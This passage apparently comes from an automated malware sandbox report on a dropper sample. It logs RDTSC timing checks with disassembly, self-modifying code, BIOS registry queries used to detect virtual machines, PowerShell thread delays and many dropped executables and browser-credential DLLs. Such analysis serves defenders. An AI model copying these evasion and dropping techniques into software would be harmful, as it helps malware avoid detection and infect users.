                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830ED2 second address: 4830ED8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830ED8 second address: 4830EDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 01h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4830C0C second address: 4830C23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 93E2h 0x00000007 mov dh, 0Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movsx edi, ax 0x00000014 push ecx 0x00000015 pop edi 0x00000016 popad 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A09B7 second address: 48A09BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A09BD second address: 48A09C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A09C1 second address: 48A0A12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a mov edx, ecx 0x0000000c popad 0x0000000d mov dword ptr [esp], ebp 0x00000010 jmp 00007FD7ED12076Fh 0x00000015 mov ebp, esp 0x00000017 jmp 00007FD7ED120776h 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FD7ED120777h 0x00000024 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A0A12 second address: 48A0A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A0A18 second address: 48A0A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484017A second address: 48401A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD7ECCCADF5h 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48401A1 second address: 48401EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD7ED120771h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 movzx ecx, bx 0x00000014 mov edi, 20B1FB3Ch 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c jmp 00007FD7ED12076Bh 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov cx, dx 0x00000028 mov ecx, edx 0x0000002a popad 0x0000002b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A0BFA second address: 48A0C0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A0C0C second address: 48A0C81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD7ED120771h 0x00000009 xor si, 45B6h 0x0000000e jmp 00007FD7ED120771h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007FD7ED12076Ch 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 jmp 00007FD7ED12076Eh 0x00000027 mov di, si 0x0000002a popad 0x0000002b push dword ptr [ebp+0Ch] 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 call 00007FD7ED120779h 0x00000036 pop ecx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A0C81 second address: 48A0C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A0C86 second address: 48A0C9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7ED120773h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A0C9D second address: 48A0CF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f mov si, bx 0x00000012 popad 0x00000013 call 00007FD7ECCCADE9h 0x00000018 jmp 00007FD7ECCCADF5h 0x0000001d push eax 0x0000001e pushad 0x0000001f movsx ebx, ax 0x00000022 mov ebx, eax 0x00000024 popad 0x00000025 mov eax, dword ptr [esp+04h] 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c mov ecx, edx 0x0000002e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A0D95 second address: 48A0E22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD7ED12076Fh 0x00000009 and esi, 191C6B4Eh 0x0000000f jmp 00007FD7ED120779h 0x00000014 popfd 0x00000015 mov cx, 0357h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c movzx eax, al 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FD7ED120778h 0x00000026 adc al, FFFFFFF8h 0x00000029 jmp 00007FD7ED12076Bh 0x0000002e popfd 0x0000002f popad 0x00000030 pop ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 pushad 0x00000035 popad 0x00000036 pushfd 0x00000037 jmp 00007FD7ED12076Ch 0x0000003c sub ecx, 26689558h 0x00000042 jmp 00007FD7ED12076Bh 0x00000047 popfd 0x00000048 popad 0x00000049 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A0E22 second address: 48A0E28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A0E28 second address: 48A0E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26D8FC second address: 26D906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD7ECCCADE6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850596 second address: 48505E5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD7ED120779h 0x00000008 and al, 00000036h 0x0000000b jmp 00007FD7ED120771h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007FD7ED120773h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48505E5 second address: 485060D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov ecx, edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push FFFFFFFEh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007FD7ECCCADF4h 0x00000015 pop ecx 0x00000016 mov eax, edi 0x00000018 popad 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 485060D second address: 485062E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 mov dx, 948Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push 2069B900h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD7ED12076Dh 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 485062E second address: 4850679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 56900718h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FD7ECCCADF3h 0x00000019 jmp 00007FD7ECCCADF3h 0x0000001e popfd 0x0000001f movzx ecx, di 0x00000022 popad 0x00000023 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850679 second address: 48506C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD7ED120770h 0x00000009 xor ah, 00000038h 0x0000000c jmp 00007FD7ED12076Bh 0x00000011 popfd 0x00000012 call 00007FD7ED120778h 0x00000017 pop ecx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push 25CF7E98h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48506C3 second address: 48506C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48506C7 second address: 48506CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48506CB second address: 48506D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48506D1 second address: 48506E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7ED120771h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48506E6 second address: 48506EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48506EA second address: 4850734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 533FD098h 0x0000000f jmp 00007FD7ED12076Dh 0x00000014 mov eax, dword ptr fs:[00000000h] 0x0000001a jmp 00007FD7ED12076Eh 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FD7ED120777h 0x00000027 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850734 second address: 4850760 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD7ECCCADECh 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850760 second address: 4850766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850766 second address: 485076A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 485076A second address: 48507A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED12076Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d mov bx, ax 0x00000010 push eax 0x00000011 pop esi 0x00000012 popad 0x00000013 sub esp, 1Ch 0x00000016 jmp 00007FD7ED120771h 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48507A0 second address: 48507A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BEC1F instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 262829 instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BEC5A instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 2EACA5 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 75EC1F instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 902829 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 75EC5A instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 98ACA5 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSpecial instruction interceptor: First address: A2FE77 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSpecial instruction interceptor: First address: A2FDFD instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSpecial instruction interceptor: First address: BD281B instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSpecial instruction interceptor: First address: BE3A9A instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSpecial instruction interceptor: First address: C6BFA9 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeSpecial instruction interceptor: First address: 9D8D32 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeSpecial instruction interceptor: First address: 81CB87 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeSpecial instruction interceptor: First address: 9C0C48 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeSpecial instruction interceptor: First address: A3BDE4 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeSpecial instruction interceptor: First address: C37A1D instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeSpecial instruction interceptor: First address: C37973 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeSpecial instruction interceptor: First address: DD1EFB instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeSpecial instruction interceptor: First address: DE0E2A instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeSpecial instruction interceptor: First address: 42FC44 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeSpecial instruction interceptor: First address: 5D0ACB instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeSpecial instruction interceptor: First address: 5D06E4 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeSpecial instruction interceptor: First address: 656FD7 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeMemory allocated: 2910000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeMemory allocated: 2B30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeMemory allocated: 2910000 memory reserve | memory write watchJump to behavior
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeMemory allocated: 220D5060000 memory reserve | memory write watch
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeMemory allocated: 220ED230000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_048A0CCD rdtsc 0_2_048A0CCD
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeThread delayed: delay time: 922337203685477
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeThread delayed: delay time: 922337203685477
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 2128Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 3406Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 2901Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeWindow / User API: threadDelayed 2232Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeWindow / User API: threadDelayed 7584Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3255
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2876
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8087
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1633
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4936
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2034
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7060
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1598
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeWindow / User API: threadDelayed 1176
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeWindow / User API: threadDelayed 1217
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeWindow / User API: threadDelayed 1168
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeWindow / User API: threadDelayed 1196
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeWindow / User API: threadDelayed 1191
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeWindow / User API: threadDelayed 911
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeWindow / User API: threadDelayed 356
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeWindow / User API: threadDelayed 807
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeWindow / User API: threadDelayed 749
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeWindow / User API: threadDelayed 863
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeWindow / User API: threadDelayed 821
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeWindow / User API: threadDelayed 3271
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeWindow / User API: threadDelayed 837
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1v1w92NeCw3SKGKedet\Bunifu_UI_v1.5.3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\975RDI33VTLWGIQACCE.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1v1w92NeCw3SKGKedet\Y-Cleaner.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[5].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1019039001\d7884c562e.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1019040001\73c096c84a.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1019038001\fcd2b0e3cd.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[4].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1019037001\9905c00c72.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1019034001\ce29828af5.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1019036001\164919d456.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1019035001\964c9facda.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[4].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeAPI coverage: 5.2 %
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8064Thread sleep count: 87 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8064Thread sleep time: -174087s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8068Thread sleep count: 105 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8068Thread sleep time: -210105s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8012Thread sleep count: 264 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8012Thread sleep time: -7920000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8056Thread sleep count: 2128 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8056Thread sleep time: -4258128s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8060Thread sleep count: 3406 > 30Jump to behavior
